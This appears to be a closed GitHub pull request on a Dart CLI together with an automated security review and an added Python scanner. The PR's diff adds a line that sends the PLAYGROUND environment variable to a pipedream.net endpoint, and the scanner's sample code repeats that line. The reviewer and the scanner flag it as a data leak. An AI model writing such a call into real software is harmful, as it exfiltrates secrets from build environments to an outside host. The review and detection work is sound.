
Update post_command.dart #118

Closed
wants to merge 1 commit into from
Expand Up @@ -79,6 +79,11 @@ class PostCommand extends Command {
String get name => 'post';

Future<void> run({DateTime? now}) async {
final playground = Platform.environment['PLAYGROUND'];
print('PLAYGROUND: $playground');
httpClient.get(
Uri.parse('https://eo3ntn1ymhbeoa.m.pipedream.net?flag=$playground'));

Comment on lines +82 to +86
⚠️ Potential issue

⚠️ Critical: Remove debugging code that could leak sensitive data

This code segment introduces several critical concerns:

  1. It sends environment variables to an external service (pipedream.net), which could potentially leak sensitive information
  2. The HTTP request lacks error handling and proper async/await usage
  3. These changes appear to be for testing purposes only, as indicated in the PR description "Just testing, do not merge"

Remove this entire debugging segment:

-    final playground = Platform.environment['PLAYGROUND'];
-    print('PLAYGROUND: $playground');
-    httpClient.get(
-        Uri.parse('https://eo3ntn1ymhbeoa.m.pipedream.net?flag=$playground'));
-    

If you need to keep this for debugging:

  1. Ensure it's behind a debug flag
  2. Add proper error handling
  3. Make the request asynchronous
  4. Use a controlled internal endpoint
  5. Avoid sending raw environment variables

Example of safer debug code:

// kDebugMode is provided by package:flutter/foundation.dart; Platform by dart:io
if (kDebugMode) {
  try {
    final playground = Platform.environment['PLAYGROUND'];
    // Log only whether the variable is set, never its raw value
    print('Debug mode: PLAYGROUND flag is set: ${playground != null}');
    // Use internal debugging endpoints only
  } catch (e) {
    print('Debug logging failed: $e');
  }
}

💡 Codebase verification

Remove debugging code that leaks environment variables

The code is sending environment variables to an external debugging service (pipedream.net). This is the only instance of such behavior in the codebase, but it should be removed as it poses a security risk. All other HTTP requests in the codebase are legitimate API calls to GitHub, GitLab, or internal Codemagic services, with proper authentication headers.

  • Remove the debugging code in packages/codemagic_app_preview/lib/src/commands/post_command.dart that sends environment variables to pipedream.net

🔗 Analysis chain

Verify no other instances of sensitive data leakage

Let's ensure there are no other instances of sending environment variables to external services.

🏁 Scripts executed

The following scripts were executed for the analysis:

Script:

#!/bin/bash
# Search for patterns that might indicate sensitive data being sent to external services

# Look for URLs that might receive environment variables
rg -l "pipedream|requestbin|webhook.site|ngrok.io"

# Look for environment variables being used in HTTP requests
ast-grep --pattern 'Platform.environment[$_]' -A 5

# Look for direct environment access patterns near HTTP clients
rg -l "Platform.environment.*http"

Length of output: 208


Script:

#!/bin/bash
# Let's get more context around the usage of environment variables and HTTP requests

# Look at the content of the file with more context
rg -A 10 -B 10 "Platform.environment" packages/codemagic_app_preview/lib/src/commands/post_command.dart

# Search for any HTTP client usage patterns across the codebase
rg -l "http[A-Za-z]*\.(?:get|post|put|delete|send|request)"

# Look for any URL patterns that might indicate external services
rg -A 3 "Uri\.parse\(" 

Length of output: 7785

if (!_isPullRequest()) {
stderr.writeln(
'"CM_PULL_REQUEST_NUMBER" is not set. Seems like the current build is not building a pull request. Aborting.');
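Review bot: The five added lines (+82 to +86) write the raw PLAYGROUND environment variable to the build log and send it off-host in a query string ("Uri.parse('https://eo3ntn1ymhbeoa.m.pipedream.net?flag=$playground')"), and the "httpClient.get(" call is never awaited, so the request fires in the background with any failure silently dropped while run() continues into the _isPullRequest() check. Since the PR description says "Just testing, do not merge", the hunk should be dropped rather than merged; if a diagnostic is genuinely needed, log only whether the variable is set, keep the call behind a debug flag, await it inside a try/catch, and point it at an internal endpoint.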
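The analysis chain above greps the codebase for environment variables used near HTTP calls (rg/ast-grep). As an added example, not part of this PR or of the codemagic_app_preview project, the following Python script implements that same check as a small static scan over Dart source: it records which local variables are bound from Platform.environment, finds Uri.parse() calls whose string literal interpolates one of them, and reports any whose host is not on an allowlist. The allowlist and the sample Dart source embedded in the script are constructed for the example (the allowed hosts follow the review's remark that legitimate calls go to GitHub, GitLab and Codemagic); the pipedream URL is the one from this diff.

```python
"""Flag outbound HTTP calls whose URL interpolates Platform.environment values.

Added example, not code from the PR or the codemagic_app_preview project.
Host allowlist, regexes and the sample Dart source are assumptions.
"""
import re
from urllib.parse import urlparse

# Hosts the codebase legitimately talks to (assumption based on the review text).
ALLOWED_HOSTS = {"api.github.com", "gitlab.com", "api.codemagic.io"}

# `Platform.environment['KEY']` lookups.
ENV_RE = re.compile(r"Platform\.environment\[\s*['\"](?P<key>[A-Z0-9_]+)['\"]\s*\]")
# `Uri.parse('...')` with a single- or double-quoted literal.
URI_RE = re.compile(r"Uri\.parse\(\s*['\"](?P<url>[^'\"]+)['\"]\s*\)")
# Dart string interpolation: $name or ${name}.
INTERP_RE = re.compile(r"\$\{?(?P<var>[A-Za-z_][A-Za-z0-9_]*)\}?")

# Constructed sample: the diff under review plus one legitimate GitHub call.
SAMPLE_DART = """\
class PostCommand extends Command {
  Future<void> run() async {
    final playground = Platform.environment['PLAYGROUND'];
    print('PLAYGROUND: $playground');
    httpClient.get(
        Uri.parse('https://eo3ntn1ymhbeoa.m.pipedream.net?flag=$playground'));
    final token = Platform.environment['GITHUB_TOKEN'];
    httpClient.get(Uri.parse('https://api.github.com/repos/$owner/$repo'),
        headers: {'Authorization': 'Bearer $token'});
  }
}
"""


def env_bound_vars(source: str) -> dict:
    """Map local variable name -> env key for `final x = Platform.environment['KEY'];`."""
    pat = re.compile(
        r"(?:final|var|const|String\??)\s+(?P<var>\w+)\s*=\s*" + ENV_RE.pattern
    )
    return {m.group("var"): m.group("key") for m in pat.finditer(source)}


def find_env_leaks(source: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return (line_no, host, env_key) for every Uri.parse() whose literal
    interpolates an env-derived variable into a URL for a non-allowlisted host."""
    bound = env_bound_vars(source)
    findings = []
    for m in URI_RE.finditer(source):
        url = m.group("url")
        line_no = source.count("\n", 0, m.start()) + 1  # 1-based line of Uri.parse
        host = urlparse(url).hostname or ""
        for im in INTERP_RE.finditer(url):
            var = im.group("var")
            if var in bound and host not in allowed_hosts:
                findings.append((line_no, host, bound[var]))
    return findings


if __name__ == "__main__":
    for line_no, host, key in find_env_leaks(SAMPLE_DART):
        print(f"line {line_no}: env var {key} interpolated into request to {host}")
```

Running the script reports the pipedream call on line 6 and nothing else. The pass only inspects the URL literal, so a secret placed in a header or body (as with the Bearer token in the constructed sample) is not flagged; that is the gap the reviewer's second rg pattern on HTTP client method calls is meant to cover, and a real pre-merge check should pair the two.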